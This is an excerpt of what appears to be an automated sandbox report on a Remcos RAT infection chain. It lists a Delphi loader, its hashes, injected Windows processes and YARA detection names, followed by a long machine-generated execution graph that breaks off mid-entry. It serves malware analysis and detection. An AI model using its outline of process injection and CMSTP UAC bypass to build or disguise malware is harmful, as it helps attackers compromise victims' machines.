                                                              MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:01:57:02
                                                              Start date:15/05/2024
                                                              Path:C:\Users\Public\Libraries\Jsqwmpul.PIF
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\Public\Libraries\Jsqwmpul.PIF"
                                                              Imagebase:0x400000
                                                              File size:1'103'360 bytes
                                                              MD5 hash:C8B0899DD51C7516316ED413771E71C4
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:Borland Delphi
                                                              Antivirus matches:
                                                              • Detection: 61%, ReversingLabs
                                                              • Detection: 60%, Virustotal, Browse
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:01:57:06
                                                              Start date:15/05/2024
                                                              Path:C:\Windows\SysWOW64\SndVol.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\System32\SndVol.exe
                                                              Imagebase:0xaa0000
                                                              File size:226'712 bytes
                                                              MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:12
                                                              Start time:01:57:11
                                                              Start date:15/05/2024
                                                              Path:C:\Users\Public\Libraries\Jsqwmpul.PIF
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\Public\Libraries\Jsqwmpul.PIF"
                                                              Imagebase:0x400000
                                                              File size:1'103'360 bytes
                                                              MD5 hash:C8B0899DD51C7516316ED413771E71C4
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:Borland Delphi
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:13
                                                              Start time:01:57:15
                                                              Start date:15/05/2024
                                                              Path:C:\Windows\SysWOW64\colorcpl.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\System32\colorcpl.exe
                                                              Imagebase:0xed0000
                                                              File size:86'528 bytes
                                                              MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2251261824.0000000003129000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000003.2246883380.0000000003129000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:20.3%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:78.6%
                                                                Total number of Nodes:845
                                                                Total number of Limit Nodes:15
                                                                execution_graph 23353 2901727 23354 2901968 23353->23354 23355 290173c 23353->23355 23356 2901a80 23354->23356 23357 2901938 23354->23357 23365 29017cb Sleep 23355->23365 23367 290174e 23355->23367 23359 2901684 VirtualAlloc 23356->23359 23360 2901a89 23356->23360 23361 2901947 Sleep 23357->23361 23369 2901986 23357->23369 23358 290175d 23362 29016df 23359->23362 23363 29016af 23359->23363 23364 290195d Sleep 23361->23364 23361->23369 23378 2901644 Sleep Sleep 23363->23378 23364->23357 23365->23367 23368 29017e4 Sleep 23365->23368 23367->23358 23371 290180a Sleep 23367->23371 23372 290182c 23367->23372 23368->23355 23373 29019a4 23369->23373 23374 29015cc VirtualAlloc 23369->23374 23370 29016bf 23370->23362 23371->23372 23375 2901820 Sleep 23371->23375 23377 2901838 23372->23377 23379 29015cc 23372->23379 23374->23373 23375->23367 23378->23370 23383 2901560 23379->23383 23381 29015d4 VirtualAlloc 23382 29015eb 23381->23382 23382->23377 23384 2901500 23383->23384 23384->23381 23385 292326a 24126 290480c 23385->24126 24127 290481d 24126->24127 24128 2904843 24127->24128 24129 290485a 24127->24129 24135 2904b78 24128->24135 24141 2904570 24129->24141 24132 290488b 24133 2904850 24133->24132 24146 2904500 24133->24146 24136 2904b85 24135->24136 24140 2904bb5 24135->24140 24138 2904b91 24136->24138 24139 2904570 11 API calls 24136->24139 24138->24133 24139->24140 24152 29044ac 24140->24152 24142 2904574 24141->24142 24143 2904598 24141->24143 24157 2902c10 11 API calls 24142->24157 24143->24133 24145 2904581 24145->24133 24147 2904504 24146->24147 24150 2904514 24146->24150 24149 2904570 11 API calls 24147->24149 24147->24150 24148 2904542 24148->24132 24149->24150 24150->24148 24158 2902c2c 11 API calls 24150->24158 24153 29044b2 24152->24153 24154 29044cd 24152->24154 24153->24154 24156 2902c2c 11 API calls 24153->24156 24154->24138 24156->24154 24157->24145 24158->24148 24159 2900009 24162 2947000 24159->24162 24171 2947216 24162->24171 24164 294700f 24165 2900015 24164->24165 24166 29470c7 24164->24166 24174 294714d 24164->24174 24166->24165 24178 2904c48 24166->24178 24188 2927d84 timeSetEvent 24166->24188 24189 2904168 24166->24189 24201 29473ad GetPEB 24171->24201 24173 2947222 24173->24164 24177 294716a 24174->24177 24175 29471a0 24175->24166 24176 294715d LoadLibraryA 24176->24175 24176->24177 24177->24175 24177->24176 24179 2904c4c 24178->24179 24180 2904c6f 24178->24180 24181 2904c0c 24179->24181 24184 2904c5f SysReAllocStringLen 24179->24184 24180->24165 24182 2904c20 24181->24182 24183 2904c12 SysFreeString 24181->24183 24182->24165 24183->24182 24184->24180 24185 2904bdc 24184->24185 24186 2904bf8 24185->24186 24187 2904be8 SysAllocStringLen 24185->24187 24186->24165 24187->24185 24187->24186 24188->24165 24190 29041ae 24189->24190 24191 290422c 24190->24191 24203 2904100 24190->24203 24191->24165 24193 29043e9 24191->24193 24196 29043fa 24191->24196 24208 290432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 24193->24208 24195 29043f3 24195->24196 24197 290443f FreeLibrary 24196->24197 24198 2904463 24196->24198 24197->24196 24199 2904472 ExitProcess 24198->24199 24200 290446c 24198->24200 24200->24199 24202 29473c0 24201->24202 24202->24173 24204 2904110 24203->24204 24205 2904143 24203->24205 24204->24205 24207 29015cc VirtualAlloc 24204->24207 24209 2905814 24204->24209 24205->24191 24207->24204 24208->24195 24210 2905824 GetModuleFileNameA 24209->24210 24212 2905840 24209->24212 24213 2905a78 GetModuleFileNameA RegOpenKeyExA 24210->24213 24212->24204 24214 2905afb 24213->24214 24215 2905abb RegOpenKeyExA 24213->24215 24231 29058b4 12 API calls 24214->24231 24215->24214 24216 2905ad9 RegOpenKeyExA 24215->24216 24216->24214 24218 2905b84 lstrcpyn GetThreadLocale GetLocaleInfoA 24216->24218 24220 2905bbb 24218->24220 24221 2905c9e 24218->24221 24219 2905b20 RegQueryValueExA 24222 2905b40 RegQueryValueExA 24219->24222 24223 2905b5e RegCloseKey 24219->24223 24220->24221 24224 2905bcb lstrlen 24220->24224 24221->24212 24222->24223 24223->24212 24226 2905be3 24224->24226 24226->24221 24227 2905c08 lstrcpyn LoadLibraryExA 24226->24227 24228 2905c30 24226->24228 24227->24228 24228->24221 24229 2905c3a lstrcpyn LoadLibraryExA 24228->24229 24229->24221 24230 2905c6c lstrcpyn LoadLibraryExA 24229->24230 24230->24221 24231->24219 24232 2927d78 24235 291d5c8 24232->24235 24236 291d5d0 24235->24236 24236->24236 26575 291cc94 GetTickCount 24236->26575 24239 2926f91 24241 291d5f9 24242 291d603 24241->24242 24243 291d60d 24242->24243 24244 291d61e 24242->24244 24246 2904500 11 API calls 24243->24246 24245 2904500 11 API calls 24244->24245 24247 291d61c 24245->24247 24246->24247 24248 290480c 11 API calls 24247->24248 24249 291d64b 24248->24249 24250 291d653 24249->24250 24251 291d65d 24250->24251 26582 2904798 24251->26582 24253 291d676 26597 2917df4 24253->26597 24256 290480c 11 API calls 24257 291d6af 24256->24257 24258 291d6c1 24257->24258 24259 2904798 11 API calls 24258->24259 24260 291d6da 24259->24260 24261 2917df4 23 API calls 24260->24261 24262 291d6f5 24261->24262 24263 290480c 11 API calls 24262->24263 24264 291d713 24263->24264 24265 291d725 24264->24265 24266 2904798 11 API calls 24265->24266 24267 291d73e 24266->24267 24268 291d746 24267->24268 24269 2917df4 23 API calls 24268->24269 24270 291d759 24269->24270 24271 290480c 11 API calls 24270->24271 24272 291d777 24271->24272 24273 2904798 11 API calls 24272->24273 24274 291d7a2 24273->24274 24275 291d7aa 24274->24275 24276 2917df4 23 API calls 24275->24276 24277 291d7bd 24276->24277 24278 290480c 11 API calls 24277->24278 24279 291d7db 24278->24279 24280 2904798 11 API calls 24279->24280 24281 291d806 24280->24281 24282 291d80e 24281->24282 24283 291d818 24282->24283 24284 2917df4 23 API calls 24283->24284 24285 291d821 24284->24285 24286 290480c 11 API calls 24285->24286 24287 291d83f 24286->24287 24288 2904798 11 API calls 24287->24288 24289 291d86a 24288->24289 24290 291d872 24289->24290 24291 291d87c 24290->24291 24292 2917df4 23 API calls 24291->24292 24293 291d885 24292->24293 24294 291d892 24293->24294 24295 291d8a3 24294->24295 24296 2917df4 23 API calls 24295->24296 24297 291d8ac 24296->24297 24298 291d8ca 24297->24298 24299 2917df4 23 API calls 24298->24299 24300 291d8d3 24299->24300 24301 291d8e0 24300->24301 24302 291d8f1 24301->24302 24303 2917df4 23 API calls 24302->24303 24304 291d8fa 24303->24304 24305 290480c 11 API calls 24304->24305 24306 291d918 24305->24306 24307 291d920 24306->24307 24308 2904798 11 API calls 24307->24308 24309 291d946 24308->24309 24310 291d951 24309->24310 24311 291d95e 24310->24311 24312 2917df4 23 API calls 24311->24312 24313 291d96a 24312->24313 24314 291d97a 24313->24314 26610 29046a4 24314->26610 26612 2907a78 26575->26612 26578 291ccc7 26578->24239 26579 2902ee0 QueryPerformanceCounter 26578->26579 26580 2902ef8 GetTickCount 26579->26580 26581 2902eed 26579->26581 26580->24241 26581->24241 26583 290479c 26582->26583 26584 29047fd 26582->26584 26585 2904500 26583->26585 26586 29047a4 26583->26586 26590 2904570 11 API calls 26585->26590 26592 2904514 26585->26592 26586->26584 26587 29047b3 26586->26587 26589 2904500 11 API calls 26586->26589 26591 2904570 11 API calls 26587->26591 26588 2904542 26588->24253 26589->26587 26590->26592 26594 29047cd 26591->26594 26592->26588 26617 2902c2c 11 API calls 26592->26617 26595 2904500 11 API calls 26594->26595 26596 29047f9 26595->26596 26596->24253 26598 2917e09 26597->26598 26599 2917e11 LoadLibraryW GetModuleHandleW 26598->26599 26618 290494c 26599->26618 26603 2917e63 26629 2917b3c 26603->26629 26611 29046aa 26610->26611 26613 2907a88 26612->26613 26614 2907aa9 Sleep GetTickCount 26613->26614 26616 290760c 42 API calls 26613->26616 26614->26578 26616->26614 26617->26588 26619 2904950 GetProcAddress 26618->26619 26620 2917d2c 26619->26620 26651 2904544 26620->26651 26623 2904798 11 API calls 26624 2917d5f 26623->26624 26625 2917d67 GetModuleHandleA GetProcAddress VirtualProtect 26624->26625 26626 2917da3 26625->26626 26627 29044d0 11 API calls 26626->26627 26628 2917db0 26627->26628 26628->26603 26630 2904500 11 API calls 26629->26630 26631 2917b5f 26630->26631 26632 290480c 11 API calls 26631->26632 26633 2917bb0 26632->26633 26634 2917bb8 GetModuleHandleW GetProcAddress GetCurrentProcess 26633->26634 26635 2917be3 26634->26635 26636 29044ac 11 API calls 26635->26636 26637 2917beb 26636->26637 26638 2917a74 26637->26638 26639 2904500 11 API calls 26638->26639 26640 2917a97 26639->26640 26641 2904798 11 API calls 26640->26641 26642 2917aaa 26641->26642 26643 2917ab2 GetModuleHandleA GetProcAddress NtWriteVirtualMemory 26642->26643 26644 2917aef 26643->26644 26645 29044ac 11 API calls 26644->26645 26646 2917af7 26645->26646 26647 29044d0 26646->26647 26648 29044d6 26647->26648 26649 29044fc 26648->26649 26656 2902c2c 11 API calls 26648->26656 26649->24256 26653 2904548 26651->26653 26652 290456c 26652->26623 26653->26652 26655 2902c2c 11 API calls 26653->26655 26655->26652 26656->26648 26657 292431e 26658 290480c 11 API calls 26657->26658 26659 292433f 26658->26659 26660 2904798 11 API calls 26659->26660 26661 2924376 26660->26661 26662 2917df4 23 API calls 26661->26662 26663 292439a 26662->26663 26664 290480c 11 API calls 26663->26664 26665 29243bb 26664->26665 26666 2904798 11 API calls 26665->26666 26667 29243f2 26666->26667 26668 2917df4 23 API calls 26667->26668 26669 2924416 26668->26669 26670 290480c 11 API calls 26669->26670 26671 2924437 26670->26671 26672 2904798 11 API calls 26671->26672 26673 292446e 26672->26673 26674 2917df4 23 API calls 26673->26674 26675 2924492 26674->26675 26676 290480c 11 API calls 26675->26676 26677 29244b3 26676->26677 26678 2904798 11 API calls 26677->26678 26679 29244ea 26678->26679 26680 2917df4 23 API calls 26679->26680 26681 292450e 26680->26681 26682 290480c 11 API calls 26681->26682 26683 292452f 26682->26683 26684 2904798 11 API calls 26683->26684 26685 2924566 26684->26685 26686 2917df4 23 API calls 26685->26686 26687 292458a 26686->26687 26688 290480c 11 API calls 26687->26688 26689 29245ab 26688->26689 26690 2904798 11 API calls 26689->26690 26691 29245e2 26690->26691 26692 2917df4 23 API calls 26691->26692 26693 2924606 26692->26693 26694 290480c 11 API calls 26693->26694 26695 2924627 26694->26695 26696 2904798 11 API calls 26695->26696 26697 292465e 26696->26697 26698 2917df4 23 API calls 26697->26698 26699 2924682 26698->26699 26700 290480c 11 API calls 26699->26700 26701 29246a3 26700->26701 26702 2904798 11 API calls 26701->26702 26703 29246da 26702->26703 26704 2917df4 23 API calls 26703->26704 26705 29246fe 26704->26705 26706 2924f4a 26705->26706 26708 290480c 11 API calls 26705->26708 26707 290480c 11 API calls 26706->26707 26709 2924f6b 26707->26709 26710 2924734 26708->26710 26711 2904798 11 API calls 26709->26711 26712 2904798 11 API calls 26710->26712 26714 2924fa2 26711->26714 26713 292476b 26712->26713 26715 2917df4 23 API calls 26713->26715 26716 2917df4 23 API calls 26714->26716 26718 292478f 26715->26718 26717 2924fc6 26716->26717 26719 290480c 11 API calls 26717->26719 26720 290480c 11 API calls 26718->26720 26721 2924fe7 26719->26721 26722 29247b0 26720->26722 26723 2904798 11 API calls 26721->26723 26724 2904798 11 API calls 26722->26724 26726 292501e 26723->26726 26725 29247e7 26724->26725 26727 2917df4 23 API calls 26725->26727 26728 2917df4 23 API calls 26726->26728 26729 292480b 26727->26729 26730 2925042 26728->26730 26731 290480c 11 API calls 26729->26731 26732 290480c 11 API calls 26730->26732 26734 292482c 26731->26734 26733 2925063 26732->26733 26735 2904798 11 API calls 26733->26735 26736 2904798 11 API calls 26734->26736 26737 292509a 26735->26737 26738 2924863 26736->26738 26740 2917df4 23 API calls 26737->26740 26739 2917df4 23 API calls 26738->26739 26741 2924887 26739->26741 26743 29250be 26740->26743 26742 290480c 11 API calls 26741->26742 26746 29248a8 26742->26746 26744 292589e 26743->26744 26747 29250e8 26743->26747 26745 290480c 11 API calls 26744->26745 26750 29258bf 26745->26750 26749 2904798 11 API calls 26746->26749 26748 290480c 11 API calls 26747->26748 26752 2925109 26748->26752 26753 29248df 26749->26753 26751 2904798 11 API calls 26750->26751 26757 29258f6 26751->26757 26754 2904798 11 API calls 26752->26754 26755 2917df4 23 API calls 26753->26755 26760 2925140 26754->26760 26756 2924903 26755->26756 26758 290480c 11 API calls 26756->26758 26759 2917df4 23 API calls 26757->26759 26763 2924924 26758->26763 26761 292591a 26759->26761 26764 2917df4 23 API calls 26760->26764 26762 290480c 11 API calls 26761->26762 26768 292593b 26762->26768 26767 2904798 11 API calls 26763->26767 26765 2925164 26764->26765 26766 290480c 11 API calls 26765->26766 26770 2925185 26766->26770 26771 292495b 26767->26771 26769 2904798 11 API calls 26768->26769 26774 2925972 26769->26774 26772 2904798 11 API calls 26770->26772 26773 2917df4 23 API calls 26771->26773 26778 29251bc 26772->26778 26775 292497f 26773->26775 26777 2917df4 23 API calls 26774->26777 26776 290480c 11 API calls 26775->26776 26781 29249a0 26776->26781 26779 2925996 26777->26779 26782 2917df4 23 API calls 26778->26782 26780 290480c 11 API calls 26779->26780 26786 29259b7 26780->26786 26784 2904798 11 API calls 26781->26784 26783 29251e0 26782->26783 26785 290480c 11 API calls 26783->26785 26789 29249d7 26784->26789 26788 2925201 26785->26788 26787 2904798 11 API calls 26786->26787 26792 29259ee 26787->26792 26790 2904798 11 API calls 26788->26790 26791 2917df4 23 API calls 26789->26791 26797 2925238 26790->26797 26793 29249fb 26791->26793 26795 2917df4 23 API calls 26792->26795 26794 2902ee0 2 API calls 26793->26794 26796 2924a00 26794->26796 26801 2925a12 26795->26801 26798 290480c 11 API calls 26796->26798 26799 2917df4 23 API calls 26797->26799 26805 2924a39 26798->26805 26800 292525c 26799->26800 27228 291d190 26800->27228 26803 2917df4 23 API calls 26801->26803 26808 2925a45 26803->26808 26807 2904798 11 API calls 26805->26807 26806 290480c 11 API calls 26809 29252a0 26806->26809 26812 2924a70 26807->26812 26810 2917df4 23 API calls 26808->26810 26811 290480c 11 API calls 26809->26811 26814 2925a78 26810->26814 26816 29252d8 26811->26816 26813 2917df4 23 API calls 26812->26813 26815 2924a94 26813->26815 26818 2917df4 23 API calls 26814->26818 26817 290480c 11 API calls 26815->26817 26819 2904798 11 API calls 26816->26819 26820 2924ab5 26817->26820 26821 2925aab 26818->26821 26823 292530f 26819->26823 26822 2904798 11 API calls 26820->26822 26824 2917df4 23 API calls 26821->26824 26830 2924aec 26822->26830 26825 2917df4 23 API calls 26823->26825 26826 2925ade 26824->26826 26827 2925333 26825->26827 26828 290480c 11 API calls 26826->26828 26829 290480c 11 API calls 26827->26829 26832 2925aff 26828->26832 26834 2925354 26829->26834 26831 2917df4 23 API calls 26830->26831 26833 2924b10 26831->26833 26836 2904798 11 API calls 26832->26836 26835 290480c 11 API calls 26833->26835 26837 2904798 11 API calls 26834->26837 26838 2924b31 26835->26838 26839 2925b36 26836->26839 26841 292538b 26837->26841 26840 2904798 11 API calls 26838->26840 26842 2917df4 23 API calls 26839->26842 26848 2924b68 26840->26848 26844 2917df4 23 API calls 26841->26844 26843 2925b5a 26842->26843 26846 290480c 11 API calls 26843->26846 26845 29253af 26844->26845 27235 2907e08 26845->27235 26854 2925b7b 26846->26854 26851 2917df4 23 API calls 26848->26851 26850 2925698 26853 290480c 11 API calls 26850->26853 26855 2924b8c GetCurrentProcess 26851->26855 26852 290480c 11 API calls 26860 29253e2 26852->26860 26861 29256b9 26853->26861 26857 2904798 11 API calls 26854->26857 27215 2917924 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 26855->27215 26864 2925bb2 26857->26864 26858 2924ba6 26859 290480c 11 API calls 26858->26859 26865 2924bcc 26859->26865 26862 2904798 11 API calls 26860->26862 26863 2904798 11 API calls 26861->26863 26871 2925419 26862->26871 26869 29256f0 26863->26869 26866 2917df4 23 API calls 26864->26866 26867 2904798 11 API calls 26865->26867 26868 2925bd6 26866->26868 26876 2924c03 26867->26876 26870 290480c 11 API calls 26868->26870 26873 2917df4 23 API calls 26869->26873 26879 2925bf7 26870->26879 26872 2917df4 23 API calls 26871->26872 26874 292543d 26872->26874 26875 2925714 26873->26875 26877 290480c 11 API calls 26874->26877 26878 290480c 11 API calls 26875->26878 26880 2917df4 23 API calls 26876->26880 26884 292545e 26877->26884 26885 2925735 26878->26885 26881 2904798 11 API calls 26879->26881 26882 2924c27 26880->26882 26888 2925c2e 26881->26888 26883 290480c 11 API calls 26882->26883 26889 2924c48 26883->26889 26886 2904798 11 API calls 26884->26886 26887 2904798 11 API calls 26885->26887 26892 2925495 26886->26892 26893 292576c 26887->26893 26890 2917df4 23 API calls 26888->26890 26891 2904798 11 API calls 26889->26891 26895 2925c52 26890->26895 26898 2924c7f 26891->26898 26896 2917df4 23 API calls 26892->26896 26894 2917df4 23 API calls 26893->26894 26897 2925790 26894->26897 26902 2917df4 23 API calls 26895->26902 26899 29254b9 26896->26899 26901 290480c 11 API calls 26897->26901 26903 2917df4 23 API calls 26898->26903 26900 290480c 11 API calls 26899->26900 26906 29254da 26900->26906 26907 29257b1 26901->26907 26908 2925c85 26902->26908 26904 2924ca3 26903->26904 26905 290480c 11 API calls 26904->26905 26912 2924cc4 26905->26912 26909 2904798 11 API calls 26906->26909 26910 2904798 11 API calls 26907->26910 26911 2917df4 23 API calls 26908->26911 26914 2925511 26909->26914 26915 29257e8 26910->26915 26916 2925cb8 26911->26916 26913 2904798 11 API calls 26912->26913 26920 2924cfb 26913->26920 26917 2917df4 23 API calls 26914->26917 26918 2917df4 23 API calls 26915->26918 26919 2917df4 23 API calls 26916->26919 26921 2925535 26917->26921 26922 292580c 26918->26922 26928 2925ceb 26919->26928 26925 2917df4 23 API calls 26920->26925 27239 291cde8 11 API calls 26921->27239 26923 290480c 11 API calls 26922->26923 26932 292582d 26923->26932 26929 2924d1f 26925->26929 26926 292554a 26927 2904500 11 API calls 26926->26927 26930 292555a 26927->26930 26933 2917df4 23 API calls 26928->26933 27216 29049a4 26929->27216 26931 290480c 11 API calls 26930->26931 26937 292557b 26931->26937 26936 2904798 11 API calls 26932->26936 26938 2925d1e 26933->26938 26935 2924d43 26939 290480c 11 API calls 26935->26939 26941 2925864 26936->26941 26940 2904798 11 API calls 26937->26940 26942 2917df4 23 API calls 26938->26942 26944 2924d72 26939->26944 26949 29255b2 26940->26949 26945 2917df4 23 API calls 26941->26945 26943 2925d51 26942->26943 26946 290480c 11 API calls 26943->26946 26948 2904798 11 API calls 26944->26948 26947 2925888 26945->26947 26953 2925d72 26946->26953 26950 29049a4 11 API calls 26947->26950 26958 2924da9 26948->26958 26954 2917df4 23 API calls 26949->26954 26951 2925892 26950->26951 27241 2918170 41 API calls 26951->27241 26957 2904798 11 API calls 26953->26957 26955 29255d6 26954->26955 26956 290480c 11 API calls 26955->26956 26961 29255f7 26956->26961 26962 2925da9 26957->26962 26959 2917df4 23 API calls 26958->26959 26960 2924dcd 26959->26960 26963 290480c 11 API calls 26960->26963 26964 2904798 11 API calls 26961->26964 26965 2917df4 23 API calls 26962->26965 26968 2924dee 26963->26968 26970 292562e 26964->26970 26966 2925dcd 26965->26966 26967 290480c 11 API calls 26966->26967 26972 2925dee 26967->26972 26969 2904798 11 API calls 26968->26969 26974 2924e25 26969->26974 26971 2917df4 23 API calls 26970->26971 26979 2925652 26971->26979 26973 2904798 11 API calls 26972->26973 26977 2925e25 26973->26977 26975 2917df4 23 API calls 26974->26975 26976 2924e49 26975->26976 26978 290480c 11 API calls 26976->26978 26981 2917df4 23 API calls 26977->26981 26982 2924e6a 26978->26982 27240 291c6d4 18 API calls 26979->27240 26983 2925e49 26981->26983 26984 2904798 11 API calls 26982->26984 26985 2917df4 23 API calls 26983->26985 26987 2924ea1 26984->26987 26986 2925e7c 26985->26986 26988 290480c 11 API calls 26986->26988 26989 2917df4 23 API calls 26987->26989 26991 2925e9d 26988->26991 26990 2924ec5 EnumSystemLocalesA GetCurrentProcess 26989->26990 27222 2917ca8 LoadLibraryW 26990->27222 26994 2904798 11 API calls 26991->26994 26999 2925ed4 26994->26999 26995 2917ca8 4 API calls 26996 2924efa GetCurrentProcess 26995->26996 26997 2917ca8 4 API calls 26996->26997 26998 2924f0e GetCurrentProcess 26997->26998 27000 2917ca8 4 API calls 26998->27000 27002 2917df4 23 API calls 26999->27002 27001 2924f22 GetCurrentProcess 27000->27001 27003 2917ca8 4 API calls 27001->27003 27005 2925ef8 27002->27005 27004 2924f36 GetCurrentProcess 27003->27004 27006 2917ca8 4 API calls 27004->27006 27007 290480c 11 API calls 27005->27007 27006->26706 27008 2925f19 27007->27008 27009 2904798 11 API calls 27008->27009 27010 2925f50 27009->27010 27011 2917df4 23 API calls 27010->27011 27012 2925f74 27011->27012 27013 290480c 11 API calls 27012->27013 27014 2925f95 27013->27014 27015 2904798 11 API calls 27014->27015 27016 2925fcc 27015->27016 27017 2917df4 23 API calls 27016->27017 27018 2925ff0 27017->27018 27019 2917df4 23 API calls 27018->27019 27020 2926023 27019->27020 27021 2917df4 23 API calls 27020->27021 27022 2926056 27021->27022 27023 2917df4 23 API calls 27022->27023 27024 2926089 27023->27024 27025 2917df4 23 API calls 27024->27025 27026 29260bc 27025->27026 27027 290480c 11 API calls 27026->27027 27028 29260dd 27027->27028 27029 2904798 11 API calls 27028->27029 27030 2926114 27029->27030 27031 2917df4 23 API calls 27030->27031 27032 2926138 27031->27032 27033 290480c 11 API calls 27032->27033 27034 2926159 27033->27034 27035 2904798 11 API calls 27034->27035 27036 2926190 27035->27036 27037 2917df4 23 API calls 27036->27037 27038 29261b4 27037->27038 27039 2917df4 23 API calls 27038->27039 27040 29261e7 27039->27040 27041 2917df4 23 API calls 27040->27041 27042 292621a 27041->27042 27043 2917df4 23 API calls 27042->27043 27044 292624d 27043->27044 27045 2917df4 23 API calls 27044->27045 27046 2926280 27045->27046 27047 2917df4 23 API calls 27046->27047 27048 29262b3 27047->27048 27049 290480c 11 API calls 27048->27049 27050 29262d4 27049->27050 27051 2904798 11 API calls 27050->27051 27052 292630b 27051->27052 27053 2917df4 23 API calls 27052->27053 27054 292632f 27053->27054 27055 290480c 11 API calls 27054->27055 27056 2926350 27055->27056 27057 2904798 11 API calls 27056->27057 27058 2926387 27057->27058 27059 2917df4 23 API calls 27058->27059 27060 29263ab 27059->27060 27061 290480c 11 API calls 27060->27061 27062 29263cc 27061->27062 27063 2904798 11 API calls 27062->27063 27064 2926403 27063->27064 27065 2917df4 23 API calls 27064->27065 27066 2926427 27065->27066 27067 290480c 11 API calls 27066->27067 27068 2926448 27067->27068 27069 2904798 11 API calls 27068->27069 27070 292647f 27069->27070 27071 2917df4 23 API calls 27070->27071 27072 29264a3 27071->27072 27073 290480c 11 API calls 27072->27073 27074 29264c4 27073->27074 27075 2904798 11 API calls 27074->27075 27076 29264fb 27075->27076 27077 2917df4 23 API calls 27076->27077 27078 292651f 27077->27078 27079 2917df4 23 API calls 27078->27079 27080 292652e 27079->27080 27081 2917df4 23 API calls 27080->27081 27082 292653d 27081->27082 27083 2917df4 23 API calls 27082->27083 27084 292654c 27083->27084 27085 2917df4 23 API calls 27084->27085 27086 292655b 27085->27086 27087 2917df4 23 API calls 27086->27087 27088 292656a 27087->27088 27089 2917df4 23 API calls 27088->27089 27090 2926579 27089->27090 27091 2917df4 23 API calls 27090->27091 27092 2926588 27091->27092 27093 2917df4 23 API calls 27092->27093 27094 2926597 27093->27094 27095 2917df4 23 API calls 27094->27095 27096 29265a6 27095->27096 27097 2917df4 23 API calls 27096->27097 27098 29265b5 27097->27098 27099 2917df4 23 API calls 27098->27099 27100 29265c4 27099->27100 27101 2917df4 23 API calls 27100->27101 27102 29265d3 27101->27102 27103 2917df4 23 API calls 27102->27103 27104 29265e2 27103->27104 27105 2917df4 23 API calls 27104->27105 27106 29265f1 27105->27106 27107 2917df4 23 API calls 27106->27107 27108 2926600 27107->27108 27109 290480c 11 API calls 27108->27109 27110 2926621 27109->27110 27111 2904798 11 API calls 27110->27111 27112 2926658 27111->27112 27113 2917df4 23 API calls 27112->27113 27114 292667c 27113->27114 27115 290480c 11 API calls 27114->27115 27116 292669d 27115->27116 27117 2904798 11 API calls 27116->27117 27118 29266d4 27117->27118 27119 2917df4 23 API 